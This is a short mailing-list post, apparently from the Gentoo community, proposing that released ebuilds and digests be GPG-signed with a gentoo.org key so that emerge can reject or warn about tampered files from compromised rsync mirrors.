what do you think about signing the ebuilds and digests with gpg?
That would make it harder for blackhats to introduce a worm or something
similiar (if they have got access to an rsync mirror).
My idea is to automatically sign the released ebuilds (before mirroring
them) with a key of gentoo.org.
Then emerge could check the sign and could discard wrong ebuilds or just
throws a warning (preferable customized with make.conf).
Just my 2 cents. ;)